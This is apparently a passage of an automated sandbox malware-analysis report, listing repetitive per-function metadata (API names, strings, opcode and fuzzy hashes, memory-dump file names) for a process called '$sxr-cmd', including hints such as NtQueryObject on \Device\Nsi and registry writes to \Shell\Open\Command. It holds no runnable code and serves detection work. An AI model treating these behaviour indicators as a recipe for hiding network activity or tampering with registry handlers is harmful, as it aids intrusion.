                                                                                                                      • Instruction ID: 52bfda52bb643abdd0206781102a4429f37e9df4be48bb5a21e24c9ab25d37c7
                                                                                                                      • Opcode Fuzzy Hash: d793cf68f885368b4ca952d7378f9a0084057b150934299f8dfb9ae4312d122b
                                                                                                                      • Instruction Fuzzy Hash: 1FA1843AA18E42D6EB108B10E4402BAF7A5FB44F68F500136DA5EC76B4EF3CE945D700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememmove$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType_wcsicmp
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3935429995-0
                                                                                                                      • Opcode ID: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                      • Instruction ID: 7b475f3706f6e233e3a5abf2e08e9966055b98a73a14fa2803b116421adf2063
                                                                                                                      • Opcode Fuzzy Hash: 2ee110a42e0ffdb27aede9fb5eb1a80379d063d7b2cbba6d0c9e22b52d84b57f
                                                                                                                      • Instruction Fuzzy Hash: 80618E3EA18A92C6E7149F21A40457AFBA4FF89FA4F098135DE4A837A4DF3CD8418740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AttributesFile
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3188754299-0
                                                                                                                      • Opcode ID: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                                      • Instruction ID: 5e9f11c1c03cf58f6135ad639900d65e4e1d53faf3dbcc55d84df31b81558022
                                                                                                                      • Opcode Fuzzy Hash: 7911f8452db39d7657d313559ed3967f3c9c4d9a39ee1e7965673abb96ed0397
                                                                                                                      • Instruction Fuzzy Hash: 3091A236A09A82C6EB649F29D8502F9BBB0FB49F65F014135DA4E877A4DF3CD945C300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                       • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                       • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _get_osfhandlememset$wcschr
                                                                                                                      • String ID: DPATH
                                                                                                                      • API String ID: 3260997497-2010427443
                                                                                                                      • Opcode ID: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                                      • Instruction ID: 8b151dca0669e9d1261c1120e7fa35e3c34eab85822232cc3b431b0ac561c333
                                                                                                                      • Opcode Fuzzy Hash: 61e475784263ec0578ee4568f0ecfacc12e0da9f92d71443f4b7f45241f80286
                                                                                                                      • Instruction Fuzzy Hash: FDD17C26A08E4286EA249B69D8401BDA3A1FF46FA8F154232DA1DC77E5DF3CEC51C740
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: File$InformationNamePathRelative$CloseDeleteErrorFreeHandleLastName_OpenQueryReleaseStatusStringUnicodeVolumeWith
• String ID: @P
• API String ID: 1801357106-3670739982
• Opcode ID: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
• Instruction ID: 39ad097056c994e282cac2004f08e94cf9e81b0d372a444838f7e9cf60b84ce5
• Opcode Fuzzy Hash: a098cbb43c680f3415d79602374c39353e633b648bff1f45cd59ed0b1006156a
• Instruction Fuzzy Hash: 38415B36B04E41DBE7108F74D4802EDABB0FB89F68F458231DA5D96AA8DF78D908C740
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$BufferConsoleInfoScreen
• String ID:
• API String ID: 1034426908-0
• Opcode ID: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
• Instruction ID: da1c1c74531807f29951303029a1aed7f416ac4c1405cc7eab86d9a24cb1b8af
• Opcode Fuzzy Hash: 99e430a40e837be57a61fbba6b08e33b3e626514a3936da40c6adeee05acd63b
• Instruction Fuzzy Hash: 6DF19136B08F828AEB64DF29D8402E9A7A1FF45F68F444136DA5D876A5DF3CE914C700
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
• String ID: NtQueryObject$\Device\Nsi$ntdll.dll
• API String ID: 2119608203-3850299575
• Opcode ID: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
• Instruction ID: 5086237b56690572924cc89aed7993011369da195066a61195b412f75d98dd2f
• Opcode Fuzzy Hash: feab1d2498c9250a2661425e4b8a349dfcf4a1842f0d5ab31da7a7890f0a6070
• Instruction Fuzzy Hash: A9B1D46221AB9086FB588FA5D5187A973B6F740FA4F845016DE4D5BB96FF3ACC40C340
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: CloseValue$CreateDeleteOpen
• String ID: %s=%s$\Shell\Open\Command
• API String ID: 4081037667-3301834661
• Opcode ID: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
• Instruction ID: 80b9c75750cc0d7d5324d9ce7b1ddcc81a87783a003b5e67ac94f957e75fa6cd
• Opcode Fuzzy Hash: 95367a666dc1e10ecfff189f591a6456c9e88ca4fe6cad7e4a3eb832a6d246c2
• Instruction Fuzzy Hash: 1E71C22AB09F4282EB128F25E0902B9EAE1FF85FA4F444131DA4E877A4DF7CDC458740
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF61551AA85
• RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF61551AACF
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF61551AAEC
• RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6155198C0), ref: 00007FF61551AB39
• RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6155198C0), ref: 00007FF61551AB6F
• RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6155198C0), ref: 00007FF61551ABA4
• RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,00007FF6155198C0), ref: 00007FF61551ABCB
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: CloseDeleteValue$CreateOpen
• String ID: %s=%s
• API String ID: 1019019434-1087296587
• Opcode ID: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
• Instruction ID: b50a237686a5e257e223b7847dd616786efc70351634294fec51963fc9bf880a
• Opcode Fuzzy Hash: 72247b027dceff1e1530fc5cf8e528a5709370e20d618e6d58b54cd87f2ef8dd
• Instruction Fuzzy Hash: 87517435B08F9286E7618F69E44476ABAE1FB89FA0F454235CA4DC37A5DF7CD8418B00
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: _wcsnicmpwcsrchr
• String ID: COPYCMD
• API String ID: 2429825313-3727491224
• Opcode ID: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
• Instruction ID: 1d7a8a5d48d12eb2f1028536a40f26bc6b3d236028815cb9c793f08688334aac
• Opcode Fuzzy Hash: 4d82711cc2208d1db92bdbc9a67415b50588ed216ffaf236914d612e0490fdc8
• Instruction Fuzzy Hash: 8DF19126F08A52C6FB608F69D0805BDB6B1AB45FB8F005236DA5DA36B4DF3CAD51C740
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
• Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$FullNamePathwcsrchr
• String ID:
• API String ID: 4289998964-0
• Opcode ID: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
• Instruction ID: 75c4455bc5a00d99cf9cf72dfa8944653612600820152b0d3436b5b5ccde7fb4
• Opcode Fuzzy Hash: ca4f6fec6d1e45853bca55d284d940f9823b5f813051b5de8d9b268dc279a2c6
• Instruction Fuzzy Hash: 01C19269A0DB5682EE949F569588379A7A0FB45FE0F005535CE0E877E1EF3CACA18340
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
Similarity
• API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
• String ID:
• API String ID: 3140674995-0
• Opcode ID: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
• Instruction ID: bbdaa6c9df3794b4ae779cee903fa7f2fb7f240c04fe9aa6be6cf396b127dd2c
• Opcode Fuzzy Hash: 86c6cc936ed28f5d2962041aedd63c90dfcb8f061e08dbf1cd00c8f518c42c6a
• Instruction Fuzzy Hash: 6631617221AB8086FB60CFA0E8847ED7375F794754F844429DA4D4BB9AEF39C548C714
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExclusiveLock$AcquireBufferCancelConsoleFileFlushInputReleaseSynchronous_get_osfhandlefflushfprintf
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3476366620-0
                                                                                                                      • Opcode ID: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                      • Instruction ID: 1c56dd3d02a7e39854837f82afe3d354a370cb32efffae762cc19e0801d91046
                                                                                                                      • Opcode Fuzzy Hash: 6372b5247c68ad753e8b139ca81a5779740cabb9e500d40167355afd769c266a
                                                                                                                      • Instruction Fuzzy Hash: F521EC28908E4296EA586F20A8553B8EB60FF4AF75F855275C55EC22F2DF3CAC45C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1239891234-0
                                                                                                                      • Opcode ID: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction ID: a88e087294aeb99ecbd7e36c5126131fe0c3135d05d534e30f8c4bd677ee2013
                                                                                                                      • Opcode Fuzzy Hash: 2df9c3f406e14fd3d0afe694dc4f4ee33357f5db5aa88c620fdb935c0216887e
                                                                                                                      • Instruction Fuzzy Hash: 59319632219F8096EB60CF65E84479E73B5F788764F940125EE8D4BB96EF39C545CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InformationProcess$CurrentDirectoryQuery_setjmp_wcsnicmpwcsrchr
                                                                                                                      • String ID: %9d
                                                                                                                      • API String ID: 1006866328-2241623522
                                                                                                                      • Opcode ID: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                      • Instruction ID: 7980fdebf800fbe16dffa7eb00f8f20967062d4eb9145e62308f228f7e8864b0
                                                                                                                      • Opcode Fuzzy Hash: 62d65c6c863574456e8a18a26f120651995e0feaf5acd41ec6a68f480e3dc1f6
                                                                                                                      • Instruction Fuzzy Hash: 0E517976A08A428AE300CF25E8405A9BBA4FB44F78F444635DA2D93BB5DF3CE914CB00
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907303660.0000020D0B620000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020D0B620000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_20d0b620000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1443284424-0
                                                                                                                      • Opcode ID: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction ID: 7b34629eb24a875622a36634e6b9333de77955a69301957a7d0240ed6b362b56
                                                                                                                      • Opcode Fuzzy Hash: 842ab73a7096774a6d188e7949bc9c8e52c1e7c3cc90b953deb272e28a8da832
                                                                                                                      • Instruction Fuzzy Hash: C5E11572719B809AE701CFA4D4883DD7BB2F344BA8F944116DE4E5BB9AEA35C51AC700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2221118986-0
                                                                                                                      • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                      • Instruction ID: 7bffe5af1a84e786f1108c64fb7bb27d960f44432a39d90c9a1575fe1cd63a69
                                                                                                                      • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                                                      • Instruction Fuzzy Hash: D2C1D636A09F8286EB60DF29E450AB9B3A0FB55F68F044136DA0D8B7B5DF3CD9508300
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocateProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1357844191-0
                                                                                                                      • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                      • Instruction ID: 0c2837be62fbc070f6b0653932172b8a58d2cb048099a77720d1472a633154eb
                                                                                                                      • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                                                      • Instruction Fuzzy Hash: 1DA19F29A18E4281EA54DF2DA851679B7A0FF84FA4F505136DE4EC7BB1DF3CE8118700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
                                                                                                                      • Associated: 00000010.00000002.2907671212.00007FF6154F0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2907949905.00007FF615522000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61552D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF61553F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908115548.00007FF615544000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      • Associated: 00000010.00000002.2908440187.00007FF615549000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_16_2_7ff6154f0000_$sxr-cmd.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: memset$DiskFreeSpace
                                                                                                                      • String ID: %5lu
                                                                                                                      • API String ID: 2448137811-2100233843
                                                                                                                      • Opcode ID: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                                      • Instruction ID: 5680c459ea797f3f33b76f22cbe5048e646371426b39ff749897e6933435a585
                                                                                                                      • Opcode Fuzzy Hash: a32004ad0b0cd9a1642accdea686924f5f32727604a55ba99b3828265f09f6cb
                                                                                                                      • Instruction Fuzzy Hash: C9417036708AC185EB61DF25E8406EAB761FB84F98F408036DA4D8BB69DF7CD949C700
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000010.00000002.2907801024.00007FF6154F1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF6154F0000, based on PE: true
